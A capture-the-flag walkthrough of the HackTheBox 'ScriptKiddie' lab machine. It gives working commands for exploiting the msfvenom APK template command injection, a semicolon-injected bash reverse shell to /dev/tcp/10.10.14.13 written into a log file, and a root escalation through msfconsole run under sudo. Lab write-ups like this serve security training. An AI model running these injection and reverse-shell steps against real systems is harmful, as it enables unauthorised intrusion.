ScriptKiddie HackTheBox WalkThrough
This is ScriptKiddie HackTheBox machine walkthrough. In this writeup, I have demonstrated step-by-step how I rooted
HackTheBox machine. Before starting let us know something about this machine. It is
Linux OS box with IP address
10.10.10.226 and difficulty
easy assigned by its maker.
First of all connect your PC with
HackTheBox VPN and make sure your connectivity with ScriptKiddie machine by pinging its IP 10.10.10.226. If all goes correct then start hacking. As usual, I started by scanning the machine. Scanning gives us an idea how we have to proceed further. Like, it helps in banner grabbing the services running over different ports and sometimes it also helps in finding vulnerabilities without much effort. I have used nmap for this task and the result is given below:-
$ sudo nmap -sC -p- -T3 -sV -oA nmap/full_scan 10.10.10.226
$ cat nmap/full_scan.nmap
Full port scan found ports 22 and 5000 as open.
OpenSSH 8.2.p1 on port
Werkzeug Web Server on port
5000 are running. Enumeration on port 22 is useless until we get some known users. Also OpenSSH 8.2p1 is not affected with any well-known vulnerability which will help us in further enumeration. So leave it here and moved forward for enumeration on port 5000. Since
httpd server is running on this port so there should also be some website running on this port. The website can be accessed at URL http://10.10.10.226:5000. But before accessing the site let us check
Werkzeug 0.16.1 in
$searchsploit for known vulnerability. No any vulnerability is found in this version.
Enumerating on Port 5000
Ongoing to the URL http://10.10.10.226:5000 found a dynamic website which consists of
searchsploit tools installed on it. Anyone can use this tool to scan any site, make msfvenom payload
I simply tried to test the functionality of payloads and found that we can make payload for
Android using this tool of the site. It also gives us feature to upload a template file in the given format. Soon I got this file upload feature I tried to upload
php file and other format files which generally execute on web server but could not get successful this is because it allows only
.apk file to upload.
After some googling and a bit of research I found an exploit for
Metasploit-framework 6.0.11. According to this exploit Metasploit Framework’s msfvenom payload generator is affected with
APK Template Command Injection Vulnerability when using a crafted APK file as an Android payload template. The affected version is
6.0.11 and below in Community edition and
4.18.0 and below in Pro edition. For more info about this exploit check here and its metasploit module is present at Rapid7 repository.
Currently we don’t know the installed version of metasploit on this machine. But it is worth in giving a try. When I tried to create an
apk payload and used that payload to upload as template I could easily exploit the vulnerability and get shell. This confirms that the installed version of metasploit is less than or equal to 6.0.11. So to exploit this vulnerability and get shell follow the given steps.
1. Create msf.apk payload using module
unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection. If your metasploit don’t have this module then update it first to latest version or explicitly download this module from
Rapid7 repo and add it to metasploit folder and don’t forget to update the database after addition.
Creating APK Payload
msf6 > search metasploit_msfvenom_apk_template
msf6 > use 0
msf6 exploit(unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection) > set LHOST 10.10.14.13
msf6 exploit(unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection) > set LPORT 4444
msf6 exploit(unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection) > exploit
msf6 exploit(unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection) > exit
$ sudo mv /root/.msf4/local/msf.apk .
2. Once you have created
msf.apk payload start netcat listener in your terminal and in browser create a payload by choosing os as
android, lhost as your
tun0 IP and choose
msf.apk file as template file.
3. At last click on
generate button to execute msf.apk file. If all goes correct you will have a shell on your netcat listener.
Getting User Shell
$ nc -nvlp 4444
~whoami && id
We have got user shell as user
kid. Let us upgrade it to fully qualified Linux shell so that we can execute more advanced Linux command through it.
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
$ export TERM=xterm
$ ^Z # CTRL + Z to background the shell
$ stty raw -echo
$ fg # To foreground the shell
We have successfully upgraded our Linux shell. Let us capture user flag from user.txt file.
Capture User Flag
$ cat /home/kid/user.txt
After some initial enumeration found another user
pwn in home directory and it has a file
scanlosers.sh. This file is accepting input from
hackers file located in
/home/kid/logs/ directory and performing some sanitization then perform
nmap scan. If you clearly analyze the code you will find a
command injection vulnerability into this code while it accepts input from hackers file. We can exploit this vulnerability by using concatenating character
; (Semi-colon). Since hackers file is owned by user
pwn so we will get shell as user pwn if we try to get shell by exploiting Command Injection Vulnerability.
$ cat /home/pwn/scanlosers.sh
To exploit this vulnerability and to get shell as user
pwn do the following.
$ cd /home/kid/logs/
$ ls -la
$ echo "a b ;/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.13/4321 0>&1' #" >> hackers
$ nc -nvlp 4321
$ whoami && id
We are pwn user now let us find our PrivEsc vector using which we can perform privilege escalation.
Finding PrivEsc Vector
$ sudo -l command found that user pwn can run
/opt/metasploit-framework-6.0.9/msfconsole as root. When I executed
msfconsole as root I could easily spawn root shell from msfconsole. So here our privilege escalation vector is Privilege Escalation using
Sudo Right Exploitation.
Let us get root shell.
Getting Root Shell
$ sudo /opt/metasploit-framework-6.0.9/msfconsole
msf6 > /bin/bash -i
# whoami && id
We are root now. Let us capture root flag from root.txt file.
Capture Root Flag
# cat /root/root.txt
This was how I rooted to ScriptKiddie HackTheBox machine. Learnt a lot during this challenge. Hope you guys have also learnt some new things. Thanks for reading this walkthrough. For any query and suggestion about the writeup feel free to write us at [email protected]. Check out my latest walkthroughs at https://ethicalhacs.com/.